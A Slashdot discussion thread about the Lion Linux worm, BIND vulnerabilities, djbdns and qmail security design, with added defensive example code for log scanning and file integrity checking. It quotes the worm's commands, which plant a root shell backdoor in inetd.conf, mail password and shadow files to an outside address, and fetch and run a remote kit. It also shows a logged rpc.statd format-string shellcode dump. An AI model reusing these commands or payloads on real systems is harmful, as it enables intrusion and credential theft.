New Linux Worm 232
mspeedie writes "Seems Linux has very much arrived judging by the number of nasty viruses starting to pop up. Check out the latest at:
Lion Worm Virus on Linux
" This is not a virus, its a worm that exploits a vulnerable bind to install a rootkit. Regardless, you should have tripwire or something running anyway.
Re:How is this a Linux problem? (Score:1)
But will it infect.... (Score:1)
Re:rootness and capabilities (Score:1)
Source (Score:1)
Re:Why is this such a big deal? (Score:1)
Spin Baby Spin! (Score:1)
Seems very biased to me... (Score:2)
Re:It can be nasty.... (Score:2)
And if you got rootkitted, how the hell are you going to know that? Unless you keep ps on a floppy?
Anyone else notice (Score:2)
Re:Shouldn't that be : (Score:2)
Could somebody de-worm my GNU
Thanks
Re:BIND is the problem, not Linux (Score:2)
For me, djbdns has never ever core dumped and updates its secondaries with no problem. It has also never had a security hole, for what it's worth.
Try the support mailing list.
Unless you don't really care, in that case, neither do I.
Re:Use DJBDNS instead of BIND. (Score:2)
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
That is not 100% correct. See http://cr.yp.to/distributors.html [cr.yp.to]. The only restriction is on redistribution of djbdns. These restrictions are not to make himself rich (if anything, he will lose money on djbdns). The restrictions are so that djbdns stays useful, functional and compatible across all platforms.
BIND is the problem, not Linux (Score:5)
Tripwire? If you were a real admin you would look at the source for BIND, declare it garbage, and run djbdns [cr.yp.to] instead.
Run BIND on production servers? Not if my life depended on it. djbdns runs chroot()'d, non-root by default and even then the author still puts up a $500 reward for anyone who can find a security hole.
I'm so glad we modern admins have a choice. djbdns [cr.yp.to] is a real, safe, fast, and well documented alternative to BIND and if I were your boss I'd fire you for not switching.
Friends don't let friends run BIND!
Re:Tripwirelike product (Score:1)
Doesn't mean you don't have to pay for it.
Re:How is this a Linux problem? (Score:1)
Besides, unless this worm is taking advantage of some Linux specific exploit: it could just as easily target any other Unix, or even Cygwin.
Re:rootness and capabilities (Score:1)
Re:Worm (Score:3)
Whether or not BIND is an exploit depends on a 3rd party developer. Whether or not it's even running depends on who PACKAGED your version of Linux.
OTOH, you have NO CHOICE when it comes to WinDOS distributions. If Microsoft f*cks up, you have no where else to look. If Bughat f*cks up, you can look to Caldera, Mandrake, Debian, Slackware and Suse.
Re:Worm (Score:2)
:-)
Coincidence? (Score:2)
Maybe it's just coincidence, but last night, I had a very weird syslog event while I was pulling down email off my (Northpoint :-) ) DSL line. Copied below is a (very badly formatted) octal dump of the relevant section of the log:
________ : :
0000000 M a r 2 3 0 1 : 5 3 : 2 7
0000020 w a l k i e s - - M A R K
0000040 - - \n M a r 2 3 0 1 : 5 4
0000060 0 4 w a l k i e s i d e n t
0000100 d [ 1 2 2 8 6 ] : s t a r t e
0000120 d \n M a r 2 3 0 1 : 5 4 : 0
0000140 7 w a l k i e s \n M a r 2
0000160 3 0 1 : 5 4 : 0 7 w a l k i
0000200 e s s y s l o g d : C a n n
0000220 o t g l u e m e s s a g e
0000240 p a r t s t o g e t h e r \n M
0000260 a r 2 3 0 1 : 5 4 : 0 7 w
0000300 a l k i e s 1 7 3 > M a r 2
0000320 3 0 1 : 5 4 : 0 7 / s b i n
0000340 / r p c . s t a t d [ 1 6 4 ]
0000360 g e t h o s t b y n a m e e
0000400 r r o r f o r ^ X 367 377 277 ^ X
0000420 367 377 277 ^ Y 367 377 277 ^ Y 367 377 277 ^ Z 367
0000440 377 277 ^ Z 367 377 277 ^ [ 367 377 277 ^ [ 367 377
0000460 277 % 8 x % 8 x % 8 x % 8 x % 8 x
0000500 % 8 x % 8 x % 8 x % 8 x % 2 3 6
0000520 x % n % 1 3 7 x % n % 1 0 x % n
0000540 % 1 9 2 x % n 220 220 220 220 220 220 220 220 220
0000560 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220
*
0002160 220 220 220 1 300 353 | Y 211 A ^ P 211 A ^ H
0002200 376 300 211 A ^ D 211 303 376 300 211 ^ A 260 f 315
0002220 200 263 ^ B 211 Y ^ L 306 A ^ N 231 306 A ^
0002240 H ^ P 211 I ^ D 200 A ^ D ^ L 210 ^ A
0002260 260 f 315 200 263 ^ D 260 f 315 200 263 ^ E 0 300
0002300 210 A ^ D 260 f 315 \n M a r 2 3 0
0002320 1 : 5 4 : 0 7 w a l k i e s
0002340 307 ^ F / b i n 307 F ^ D / s h A 0
0002360 300 210 F ^ G 211 v ^ L 215 V ^ P 215 N ^
0002400 L 211 363 260 ^ K 315 200 260 ^ A 315 200 350 177 377
0002420 377 377 \n
0002423
________
Did someone try to h4x0r my laptop?
Schwab
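The dump above is the classic shape of a format-string payload hitting rpc.statd: a row of stack addresses, a run of %8x conversions to walk the stack, %n conversions to write to memory, a long NOP sled and a /bin/sh string. The following is an added example, not part of the thread or of any CERT tooling, showing how a defender can scan syslog lines for those features. The regular expressions, thresholds and sample lines are constructed for illustration and loosely shaped after the dump in the post above; the line index and counts it reports are for the constructed sample only.

```python
import re

# Added example (not from the thread): heuristics for spotting format-string
# attack residue in syslog lines. Thresholds and names are illustrative choices.

NOP_SLED = re.compile(rb"\x90{16,}")          # long run of x86 NOP bytes
WRITE_CONVERSIONS = re.compile(rb"%\d*n")     # %n / %137n: write-to-memory conversions
READ_CONVERSIONS = re.compile(rb"%\d*[xdsp]") # %8x etc.: conversions that walk the stack


def indicators(line: bytes) -> dict:
    """Count the tell-tale features of a format-string payload in one log line."""
    nonprintable = sum(1 for b in line if (b < 0x20 and b != 0x09) or b > 0x7e)
    return {
        "percent_n": len(WRITE_CONVERSIONS.findall(line)),
        "stack_reads": len(READ_CONVERSIONS.findall(line)),
        "nop_sled": NOP_SLED.search(line) is not None,
        "shell_string": b"/bin/sh" in line,
        "nonprintable": nonprintable,
    }


def is_suspicious(ind: dict) -> bool:
    """%n or a NOP sled is decisive; many %x plus raw bytes is strong circumstantial evidence."""
    return (ind["percent_n"] > 0 or ind["nop_sled"]
            or (ind["stack_reads"] >= 4 and ind["nonprintable"] >= 8))


def scan(lines):
    """Return (index, indicators) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        ind = indicators(line)
        if is_suspicious(ind):
            hits.append((i, ind))
    return hits


# Constructed sample log, shaped after the od(1) dump in the post above.
# Line 2 carries fake stack addresses, %8x reads, %n writes, a NOP sled and /bin/sh;
# the other lines are ordinary syslog noise, including a harmless "85%".
SAMPLE_LINES = [
    b"Mar 23 01:53:27 walkies -- MARK --",
    b"Mar 23 01:54:04 walkies identd[12286]: started",
    (b"Mar 23 01:54:07 walkies /sbin/rpc.statd[164]: gethostbyname error for "
     + b"\x18\xf7\xff\xbf" * 2 + b"\x19\xf7\xff\xbf" * 2
     + b"\x1a\xf7\xff\xbf" * 2 + b"\x1b\xf7\xff\xbf" * 2
     + b"%8x" * 9 + b"%236x%n%137x%n%10x%n%192x%n"
     + b"\x90" * 40 + b"\xcd\x80/bin/sh"),
    b"Mar 23 02:00:01 walkies cron[200]: /var 85% full",
]

if __name__ == "__main__":
    for i, ind in scan(SAMPLE_LINES):
        print(i, ind)
```

Run it on real logs by reading the file in binary mode (syslog will have stored the raw bytes, which is exactly why od was needed to look at them); a hit is a reason to check that the named daemon is patched and to look for the post-exploitation artifacts the thread describes, not proof that the attempt succeeded.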
Re:Coincidence? (Score:2)
Thank you very much for the heads up. I went to CERT's site, and found an example syslog entry almost identical to the one on my laptop. Fortunately, I already had the fixed rpc.statd (v0.9.1-1) installed on my Debian laptop.
I'll go update 'bind' now (assuming I bothered to install it).
Schwab
Re:It can be nasty.... (Score:2)
Re:/. presses about to fall over (too slanted!) (Score:2)
Right. And I suppose you're going to sit there and claim that you're never hypocritical or apply double standards. If you do, you just proved my point.
-"Zow"
partial rant, (Score:4)
This statement is really indicative of another thing: cluelessness. Running tripwire will tell someone that they have been cracked! Close the barn door Edith, the cows just escaped!
Maybe the "or something" alludes to the real solution; don't run BIND, run an up-to-date patched version of BIND, run snort, etc... Maybe he should have said, "Patch early, patch often." But nooooo! Run tripwire.
BTW, this worm is really no different than the ramen worm; similar concept, different exploit. What has gotten the attention of sysadmins is that they are seeing a sudden surge in traffic to port 53. These sysadmins are the target audience of SANS, and the sysadmins don't like someone messing with their DNS. I believe that is why the Global Incident Analysis Center (GIAC) of SANS changed their current threat level to yellow. This comment was posted on GIAC (note TCP, not UDP to port 53).
BTW, the n.g. comp.os.linux.security had a posting about this (didn't know it was lion) back on Tuesday. In that thread, the guy that got cracked found this (using strings on the rogue program)
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf
/etc/passwd >> 1i0n
/etc/shadow >> 1i0n
/.bash_history
killall -HUP inetd;ifconfig -a > 1i0n
cat
cat
mail 1i0nip@china.com < 1i0n rm -fr 1i0n
rm -fr
lynx -dump http://XXXXXXXX.XX.net/crew.tgz >1i0n.tgz
tar -zxvf 1i0n.tgz
rm -fr 1i0n.tgz;cd lib
./1i0n.sh
Re:rootness and capabilities (Score:2)
BRAKES
--
Re:Virii, OS acceptance, and making fun (Score:2)
The fact that the user has to click on a lengthy warning dialog to execute ILOVEYOU, which amounts to nothing more than a shell script (a WSH script, specifically).
Lion can be installed remotely without your ever knowing it, using a tool that ships with almost every Linux distro. But that's the admin's fault -- for running Linux.
--
Re:I was hit by this. (Score:2)
Paul
Re:Did you know... (Score:2)
Paul
Re:This is not a virus. (Score:2)
FWIW: There are more and more real viruses happening in the Windows world now that Win32's better understood by the bad guys.
Paul
Re:tripwire (Score:2)
As far as alerts go for public-facing services, generally you're better off following when the vendor/project team has released an update rather than trying to follow the mishmash of alerts, posts and filter the useful info out.
Paul
Re:Anyone else notice (Score:2)
Paul
Re:rootness and capabilities (Score:2)
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Default configuration: Make your own distribution or script to turn everything on the way you like it. Neither is very difficult, and fixing is more productive than bitching.
Back to the task at hand- RSBAC could have stopped this worm, it's about time it went into a development kernel.
Paul
Re:This isnt a virus, a worm, or a trojan (Score:2)
http://www.tuxedo.org/~esr/jargon/html/entry/wo
http://www.tuxedo.org/~esr/jargon/html/entry/vi
As far as malicious code, it's actually pretty boring, there are at least two examples of the exploit the worm uses to propagate, but it's definitely a worm and it appears to be in the wild.
Paul
Re:This is not a virus. (Score:2)
It is useful to note that we're getting more executable Win32 viruses now though (as opposed to scripts and macros- which are still pervasive but were pretty much all that was coming out for a while.) Our malcode guys have been predicting that for a while though. What worries me is the ELF file infector stuff. Thank goodness we haven't reached critical mass for Linux binaries yet, as there's still time to build in protection.
Paul
Re:Invincible (Score:2)
Paul
Re:rootness and capabilities (Score:2)
Not everyone needs those (unlike brakes on a car), and just like a manual transmission, not everyone can operate one, so for Linux it's optional.
Sorry if you're used to fast food, some of us enjoy ordering quality food item-by-item to get the best meal, not just the same old Happy Meal.
If you want it enough, you'll install it, if you don't, then you don't have to. If you want to wait for someone to create a turnkey distribution you can do that too. Just don't whine like a little baby that someone else isn't doing everything for you.
Actually, the quality bar has been set to "if it doesn't do it out of the box, generally someone's put a hell of a lot of work into doing it and is willing to share it and support it if you take one step in their direction." That's a hell of a lot better than "If it doesn't do it out of the box, wait until the vendor decides to release a bug-ridden version of it and if they don't want to, then you don't get that."
Hold your breath waiting for MAC-based compartments in WindowsANYTHING, or anything else that looks sufficiently B-level to provide strong security.
You might like bloated "it's all in there no matter if it's necessary or not" software systems, but they're not conducive to security and it's best when security-minded people build security critical pieces of them instead of OS-minded people, so patching for RSBAC works very well for those of us who care about security that deeply. It also makes the code easier to check when it's diffs instead of intermingled with the base kernel code.
If you buy a 2 seater sports car, don't expect it to be good at off-roading. The power of Linux is in the fact that I can get anything from RSBAC security to high-powered general purpose clusters and run the same code on them all.
If you need a silly little box around the software to make you happy, then you shouldn't be looking at Linux, it's not about inside the box.
Back on topic: RSBAC actually solves the "I don't want the administrator to be able to trojan this machine" problem as well as is possible on general purpose hardware (you can go download the international patches if you want to add another layer- or I suppose you could pay someone to do it since you seem to be allergic to actually installing software- must be hell when those new Reader Rabbit things come out!) The only other systems that come close cost tens of thousands of dollars and/or are obsolete.
Must have really pained you to choose which options you wanted on your car, or are you just walking until someone figures out how to have leather and cloth seats at the same time?
Paul
Re:This isnt a virus, a worm, or a trojan (Score:2)
It does *not* appear to rootkit downstream infected machines, but it *does* move itself to other computers, which is what makes it a worm. Auto-exploit code is only a component of a worm if it automatically transfers itself to new machines. This code does that, therefore it's a worm.
Replication if it infected "normal" programs would make it a virus, replication like this makes it a worm. Take away the self-replication and it's an exploit. All of these terms are well-defined, well-known and well-understood in the security and malcode communities.
In this case, the *worm* is the entire kit, and the exploit is a GLIBC 2.0 based executable called "bind" that's utilized by the worm to propagate via the TSIG overflow in BIND 8.2.x where x<3-REL.
"That system is left alone" is patently false in this case, since the downstream machine loads the smaller worm code and starts infecting machines of its own.
I dunno what you think a worm is, but the rest of
the community is sure that this is a worm. It's a boring worm, but it's definitely a worm.
Paul
rootness and capabilities (Score:4)
Re:Everybody should have seen it coming... (Score:3)
Caution: Now approaching the (technological) singularity.
They're called "viruses"... (Score:2)
I don't mean to split hairs, but the word "virii" makes my skin crawl, the same way "irregardless" or "it's" used possessively does...
I'll shut up now... :-)
-B
Re:They're called "viruses"... (Score:2)
Bullshit. It's wrong, annoying, and used only by people who either want to make other people think they're smart or just don't know any better.
A "somewhat archaic grammatical structure"?!? WTF are you talking about? You sound like Ash in Army of Darkness: "Your primitive brains can't comprehend things with alloys and molecules, and uh..."
So I have a choice between your opinion and those of two dictionaries. Hmmm, let me see... Yeah, I think you're right and both dictionaries are wrong! Uh huh. Any other words you care to invent that you would like to share?
Look it up. Links are in the original post.
-B
Re:Use DJBDNS instead of BIND. (Score:2)
Really, then try this. Install qmail/svscan on a system with sendmail installed. Then try to start up qmail using svscan without shutting down sendmail. Then watch your system load jump to 5+ and your system grind to a halt. And yes it is easy to get into this situation if for example you forget to shut down sendmail during a transition to qmail or you accidentally forget to remove sendmail from the list of daemons started up at boot.
Re:regardless... (Score:2)
http://64.252.15.27
Re:This is not a virus. (Score:2)
Actually as a techie, I view a lot of Slashdot's population in exactly the same way. It's a tool, people -- not a religion.
Tools chip, break, and fall apart. All tools do.
Simon
Re:Virii, OS acceptance, and making fun (Score:2)
Yeah, but that's the equivalent of saying no nation is free of diseases. There are some places in the world you'd rather be (America, Europe, Japan, etc.) than others (Somalia, Haiti, Ghana). Better hospitals and better sanitation would be good reasons to prefer the more powerful industrialized nations. If anyone's been claiming that Linux (and UNIX in general) is invulnerable, then they really need to ask themselves why there even is an effort to make systems like OpenBSD. However, saying that one outbreak of a worm makes Linux on the same level as Windows in terms of security is like claiming that the LA riots made America equivalent to Palestine in terms of social stability.
Yes, there are Linux worms. Yes, there are Linux root-kits, designed to exploit well-known bugs in programs distributed with certain Linux distributions. Does that mean that Linux is anywhere near as vulnerable as Windows? I don't think so. Security is still a reason to switch from Windows to Linux, and a knowledgeable person who actually cares about security can put together a nearly bulletproof box with a little effort.
Could you say the same for Windows? Maybe, but it's a lot harder and takes away a lot more functionality to do so because there are fewer alternative solutions to replace the builtin solutions. (No IIS, no "Windows Networking", no Outlook, no IE, etc.)
Automatic upgrade support needed (Score:2)
Re:Solutions (Score:2)
Another reason I'm not worried? I'm running a chrooted bind. The feature is still labelled as "experimental" in the branch I'm running, but it works very well. There are instructions all over the net. Even if BIND is exploited, they won't get far.
The number of port 53 scans I've gotten in recent weeks should frighten the pants off anyone who is running an unpatched BIND. I would not be surprised if we see a major DDoS soon.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
YES! (Score:4)
Oh, wait. I'm one of those Linux-using bastards.
Why exactly are BIND and Sendmail known for holes? (Score:2)
Re:Tripwirelike product (Score:4)
Tripwire has split into a commercial version and an open source version.
--
Re:Worm (Score:3)
However, my argument still stands because most users don't consider their kernel to be their OS, and they consider their Operating System to be Linux and not GNU (which it really is as debian HURD developers will quickly point out to you). So the difference is largely a misnomer...
My point here would be that desktop users may want choices, but more importantly, they want intelligent default choices to be made for them by their distributions so they don't ever have to worry about it. This includes not defaulting to buggy software or worm vulnerable builds of BIND. A good OS will instill confidence in the user by making good default choices on their behalf (which Windows/Mac do well) and allowing them to inspect and change them if they desire (which linux does well). Both of these are the responsibility of the distro if linux is ever to move over to the desktop.
-pos
The truth is more important than the facts.
Worm (Score:5)
If linux is just for hackers, then fine. BUT, if you have ever expressed that you want linux to be the default instead of Mac, Windows or whatever then you owe it to yourself to be realistic about why most people use computers. It's probably different than why you do, and it's probably because they just want software that does a job for them. They don't care how it works and they shouldn't have to. We don't make fun of people who don't know what happened when their car breaks. Sure... it's respectable to know why, but it's not a sin not to.
And second...
Regardless, you should have tripwire or something running anyway
That is a total cop-out! I'm sure everyone here knows that a windows user would get absolutely jumped on if they said something like that about windows security. "Security hole in windows? you should be running antivirus software. It's your own fault."
flame on.
-pos
The truth is more important than the facts.
Re:regardless... (Score:2)
These "people" are you and me, the admins. This problem is clearly the admin's fault.
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-b
There is very little truth in your statement these days. On most recent distros you have to choose explicitly to be a server. If you don't, you have to explicitly choose to install and enable BIND. Truth be known, I doubt there are very many KDE workstations out there running named.
No, the blame lies in lazy (or nonexistent?) sysadmins. Let's face it; why is your server running BIND if it doesn't need to (you chose it from the install...)? If the machine is a nameserver, then when the advisory came out in January, did you patch up right away? If not, WHY NOT? The vendors got updated RPMs and whatnot out fairly quickly.
For the non-existent admin problem, things like the Redhat network [redhat.com] will help tremendously.
Not trying to flame here, but your ranting sounds like the parents who blame high-school shootings on video games and movies, when they should be pointing in the mirror. To all the slack admins out there: Enough of this sh*t. Suck it up and do your damn jobs.
FWIW, installs are getting very savvy these days, taking up the slack for the poor job a lot of admins out there are doing; check out RH's latest beta (wolverine?) install - it does ipchains config during the install.
Re:How is this a Linux problem? (Score:2)
So unless you're a Linux user, or an X86 BSD user who's so whacked out he's running a linux binary of bind, you aren't affected by this worm.
Re:This is not a virus. (Score:2)
Nope, that's a trojan. Here's a quick explanation of the different terms for malicious code:
Trojan Horse ("Trojan") A Trojan is a standalone program that the user is tricked into running, which will in turn do bad things.
Virus. A virus is a program that attaches itself to (infects) executables- usually anything that's run while the virus is in memory. When an infected program is executed on a system that does not already have the virus in memory, it will usually load itself into memory for the purpose of infecting yet another system. They really haven't been seen much in recent years, as it's too much hassle and requires much more intelligence than other malicious programs. I'm sure a good portion of the slashdot audience will remember viruses such as Michelangelo, Dark Avenger, PC-Stoned!, etc. (I was hit by Michelangelo on its second run-around)
Worms. A worm is any malicious program that propagates itself directly to other machines (usually via a network) whereas a virus relies on the execution of an infected program, and a trojan relies on execution of itself.
I hope that clears it up :)
Re:This is not a virus. (Score:2)
Hence the usefulness of quoting.
Tripwire (Score:4)
Anyone here a falsetto? (Score:4)
The mighty network
The Lion creeps tonight
All together now!
In the network
The mighty network
The Lion creeps tonight
-drin
Feh (Score:2)
If you do have a domain, don't run bind. It's in the same hole-a-week club as the FTP servers and Sendmail. Don't run bind.
If you absolutely must run bind, get the latest one, compile it static and run it chrooted as a user/group specifically created JUST to run bind.
Next week's class: Don't run FTPD.
Well... (Score:2)
Well then you're not running bind are you? Maybe I should have said Bind.
I think my message here is don't run Bind. You know what I'm saying?
Re:Tripwirelike product (Score:2)
IIRC Tripwire is GPL now. But in any case I prefer AIDE [cs.tut.fi] myself.
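Several posts in this thread argue about whether "tripwire or something" is a real answer and, as one of them puts it, how you would ever know you had been rootkitted unless you kept ps on a floppy. The example below is added here and is not code from the thread, from Tripwire or from AIDE: it is a minimal integrity checker of the same kind, which records a SHA-256 digest, permission bits and size for every regular file under a directory, then diffs a later snapshot against that baseline. All function names and the constructed fake /bin tree in demo() are illustrative; the "rootkit" it simulates is just a rewritten ps of identical size, one added setuid file and one deleted tool.

```python
import hashlib
import os
import stat
import tempfile

# Added example (not from the thread, Tripwire or AIDE): a minimal file
# integrity checker. Function and file names are made up for illustration.


def hash_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Record digest, permission bits and size for every regular file under root."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):   # skip symlinks, devices, sockets
                continue
            rel = os.path.relpath(path, root)
            baseline[rel] = {
                "sha256": hash_file(path),
                "mode": stat.S_IMODE(st.st_mode),
                "size": st.st_size,
            }
    return baseline


def compare(old, new):
    """Diff two baselines; any change to a system binary is a rootkit indicator."""
    report = {"added": [], "removed": [], "modified": []}
    for rel in sorted(set(old) | set(new)):
        if rel not in old:
            report["added"].append(rel)
        elif rel not in new:
            report["removed"].append(rel)
        elif old[rel] != new[rel]:
            report["modified"].append(rel)
    return report


def _write(root, rel, data, mode=0o755):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, mode)


def demo():
    """Constructed scenario: baseline a fake /bin, then simulate a rootkit install."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/ps", b"#!/bin/sh\necho real ps\n")
        _write(root, "bin/ls", b"#!/bin/sh\necho real ls\n")
        _write(root, "bin/netstat", b"#!/bin/sh\necho real netstat\n")
        baseline = build_baseline(root)   # in practice: store this read-only, off the box

        # Simulated rootkit: trojaned ps (same size, so only the digest changes),
        # a new setuid binary, and a deleted tool.
        _write(root, "bin/ps", b"#!/bin/sh\necho FAKE ps\n")
        _write(root, "bin/1i0n", b"#!/bin/sh\n", mode=0o4755)
        os.remove(os.path.join(root, "bin", "netstat"))

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

The baseline is only worth anything if it lives somewhere the attacker cannot rewrite it, and if the checker itself, its Python interpreter and its hashlib are trusted; on a box where ps and ls have already been replaced, that means running the check from read-only or external media, which is the modern form of the floppy.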
Re:rootness and capabilities (Score:2)
Re:Use DJBDNS instead of BIND. (Score:2)
IIRC, Dan really dislikes syslog, so this may not be far from the truth.
Re:no, tripwire should not be a necessity (Score:2)
This is not a perfect world. Just because you do not know of any exploitable root holes in sshd, telnetd, apache, etc today, does not mean that one will not be found tomorrow.
It is not uncommon for exploits to be discovered and traded in the black-hat community for days, months or even years before being made public.
To believe that you will not be targeted by 'real crackers' because you are not an interesting target is a naive and dangerous assumption.
Bad code is bad code, diversity is a red herring. (Score:2)
Competing apps should continue to compete, but badly written monolithic software that requires root access and is a long-running source of exploits (BIND and sendmail come to mind) should be gotten rid of, not kept around for the sake of 'diversity'.
The reason that DJBDNS is not exploited where BIND is is not because one is more popular, but because BIND is written so badly that nothing short of throwing it away and starting from the ground up (as DJBDNS has done) will fix it.
Use DJBDNS instead of BIND. (Score:5)
There are way to many machines running full services when only one or two listening processes are really needed, if that.
Re:Why exactly are BIND and Sendmail known for hol (Score:5)
Both Sendmail and BIND suffer from the same basic problem- they are huge monolithic programs that must be executed as root to perform their intended duties.
Why is qmail secure? The reason I started the qmail project was that I was sick of the security holes in sendmail and other MTAs. Here's what I wrote in December 1995:
As it turned out, fourteen security holes [slashdot.org] were discovered in sendmail in 1996 and 1997. I followed seven fundamental rules in the design and implementation of qmail:
sendmail treats programs and files as addresses. Obviously random people can't be allowed to execute arbitrary programs or write to arbitrary files, so sendmail goes through horrendous contortions trying to keep track of whether a local user was ``responsible'' for an address. This has proven to be an unmitigated disaster.
In qmail, programs and files are not addresses. The local delivery agent, qmail-local, can run programs or write to files as directed by ~user/.qmail, but it's always running as that user. (The notion of ``user'' is configurable, but root is never a user. To prevent silly mistakes, qmail-local makes sure that neither ~user nor ~user/.qmail is world-writable.)
Security impact: .qmail,
like .cshrc and .exrc and various other files,
means that anyone who can write arbitrary files as a user can execute
arbitrary programs as that user. That's it.
A setuid program must operate in a very dangerous environment: a user is under complete control of its fds, args, environ, cwd, tty, rlimits, timers, signals, and more. Even worse, the list of controlled items varies from one vendor's UNIX to the next, so it is very difficult to write portable code that cleans up everything.
Of the twenty most recent sendmail security holes, eleven worked only because the entire sendmail system is setuid.
Only one qmail program is setuid: qmail-queue. Its only purpose is to add a new mail message to the outgoing queue.
The entire sendmail system runs as root, so there's no way that its mistakes can be caught by the operating system's built-in protections. In contrast, only two qmail programs, qmail-start and qmail-lspawn, run as root.
Even if qmail-smtpd, qmail-send, qmail-rspawn, and qmail-remote are completely compromised, so that an intruder has control over the qmaild, qmails, and qmailr accounts and the mail queue, he still can't take over your system. None of the other programs trust the results from these four.
In fact, these programs don't even trust each other. They are in three groups: qmail-smtpd, which runs as qmaild; qmail-rspawn and qmail-remote, which run as qmailr; and qmail-send, the queue manager, which runs as qmails. Each group is immune from attacks by the others.
(From root's point of view, as long as root doesn't send any mail, only qmail-start and qmail-lspawn are security-critical. They don't write any files or start any other programs as root.)
I have discovered that there are two types of command interfaces in the world of computing: good interfaces and user interfaces.
The essence of user interfaces is parsing: converting an unstructured sequence of commands, in a format usually determined more by psychology than by solid engineering, into structured data.
When another programmer wants to talk to a user interface, he has to quote: convert his structured data into an unstructured sequence of commands that the parser will, he hopes, convert back into the original structured data.
This situation is a recipe for disaster. The parser often has bugs: it fails to handle some inputs according to the documented interface. The quoter often has bugs: it produces outputs that do not have the right meaning. Only on rare joyous occasions does it happen that the parser and the quoter both misinterpret the interface in the same way.
When the original data is controlled by a malicious user, many of these bugs translate into security holes. Some examples: the Linux login -froot security hole; the classic find | xargs rm security hole; the Majordomo injection security hole. Even a simple parser like getopt is complicated enough for people to screw up the quoting.
In qmail, all the internal file structures are incredibly simple: text0 lines beginning with single-character commands. (text0 format means that lines are separated by a 0 byte instead of line feed.) The program-level interfaces don't take options.
All the complexity of parsing RFC 822 address lists and rewriting headers is in the qmail-inject program, which runs without privileges and is essentially part of the UA.
Keep It Simple, Stupid
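The "good interfaces versus user interfaces" argument above is easiest to see with the two formats side by side. The following is an added example, not code from qmail or from the thread: a tiny encoder and decoder for the text0 record layout the post describes (a single-character command, then the payload, terminated by a 0 byte) next to a naive line-oriented format of the kind a parser-plus-quoter design produces. The command letters F and T, the sample addresses and the function names are illustrative assumptions, not qmail's actual queue file format.

```python
# Added example, not from the thread or from qmail: an encoder/decoder for a
# text0-style record format (one-character command + payload, terminated by a
# 0 byte) next to a naive whitespace/newline-delimited format, to show why the
# structured form needs no quoting layer. Command letters are illustrative.


def encode_text0(records):
    """records: list of (one-char command, payload bytes). No escaping exists or is needed."""
    out = bytearray()
    for cmd, payload in records:
        if len(cmd) != 1 or ord(cmd) == 0 or ord(cmd) > 0x7f:
            raise ValueError("command must be a single ASCII character")
        if b"\x00" in payload:
            raise ValueError("payload may not contain the 0 byte")
        out += cmd.encode("ascii") + payload + b"\x00"
    return bytes(out)


def decode_text0(data):
    """Split on the 0 byte; the whole parser is a few lines and has one failure mode."""
    if data and not data.endswith(b"\x00"):
        raise ValueError("truncated record")
    records = []
    for line in data.split(b"\x00")[:-1]:
        if not line:
            raise ValueError("empty record")
        records.append((chr(line[0]), line[1:]))
    return records


def encode_naive(records):
    """'<cmd> <payload>\\n' per record: a format that needs quoting rules it does not have."""
    return b"".join(cmd.encode("ascii") + b" " + payload + b"\n" for cmd, payload in records)


def decode_naive(data):
    """The matching line parser; it cannot tell data from structure."""
    records = []
    for line in data.split(b"\n"):
        if not line:
            continue
        cmd, _sep, payload = line.partition(b" ")
        records.append((cmd.decode("ascii"), payload))
    return records


# Constructed sample: a sender (F) and recipients (T), one of which carries a
# newline and a leading "-" that a line-oriented parser turns into a new
# record, the same shape of confusion as the login -froot hole named above.
SAMPLE = [
    ("F", b"alice@example.com"),
    ("T", b"bob@example.com"),
    ("T", b"\"odd name\" <o n@example.com>\n-froot"),
]


def roundtrip_text0(records):
    return decode_text0(encode_text0(records))


def roundtrip_naive(records):
    return decode_naive(encode_naive(records))


if __name__ == "__main__":
    print(roundtrip_text0(SAMPLE) == SAMPLE)   # True
    print(roundtrip_naive(SAMPLE) == SAMPLE)   # False: "-froot" becomes its own record
```

The point is not that the naive decoder has a bug that could be patched; it is that any payload containing the delimiter forces a quoting convention, and every producer and consumer then has to implement that convention identically. The text0 form removes the problem by choosing a delimiter the data is never allowed to contain and rejecting it up front.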
Re:It can be nasty.... (Score:2)
"One World, one Web, one Program" - Microsoft promotional ad
Re:How is this a Linux problem? (Score:2)
The correct way to respond to this is "we've found a problem, now let's make sure this problem doesn't happen again". I want to be proud of linux, I want linux to be a great operating system; that's not going to happen as long as we concentrate more on blaming others for their mistakes and downplaying ours than on working on solutions.
This comment in particular bothers me.
Why should I need to run tripwire or any security software? If an OS is secure, an idiot should be able to administer it and not worry about worms/backdoors/viruses. I like the slogan "secure by default".
I'm a computer scientist, not a writer, so no comments on the grammar or spelling please.
Re:rootness and capabilities (Score:2)
I'm hoping that you mean Linux security, since this isn't true at all for many other UNIX OSes. For Linux, I think the security is good enough for what it is, when it is used right. The problem is that many applications and servers don't use it right. POSIX.1e-style capabilities (see Linux-privs - POSIX.1e Capabilities for Linux, http://www.sourceforge.net/projects/linux-privs/ [sourceforge.net]) are probably the answer. A more legitimate qualm with the *nix model is that it is coarse-grained. I think at least a handful of UNIX OS's have responded with support for Access Control Lists, which provide more fine-grained file access (see Extended Attributes and Access Control Lists for Linux, http://acl.bestbits.at [bestbits.at]).
